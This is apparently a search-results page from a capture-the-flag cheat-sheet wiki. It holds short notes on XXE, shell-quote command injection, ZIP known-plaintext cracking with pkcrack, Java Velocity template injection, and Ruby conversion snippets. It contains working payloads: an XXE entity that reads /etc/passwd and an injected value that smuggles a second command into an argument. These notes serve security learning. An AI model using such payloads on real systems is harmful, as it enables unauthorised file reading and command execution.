Search Results
5 total results found
XML injection
XXE (XML External Entity)
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
CMD injection
Shell single quote
For: date '$FORMAT'
FORMAT: '; cat /flag'
Gives: date ''; cat /flag''
ZIP cracking
Known plaintext (file)
https://github.com/keyunluo/pkcrack
Needs one exact file in plaintext from the encrypted archive. The ZIP archive encrypts each file individually but with the same key, so one can list the contents and file sizes before and after compression. ...
SSTI - Server Side Template Injections
Server Side Template Injections
Template injection examples
Java - Velocity
Runs a command
Gets the String([binary], encoding) constructor (we can't call new in the context of a template)
Calls the constructor to convert the binary array of command output to a UTF-8 string for ...
IRB
Chunk: s.scan(/......./)
Binary to integer: s.to_i(2)
Integer to ASCII character: 123.chr
Hex to integer: "7D".to_i(16)
Integer to hex: 125.to_s(16)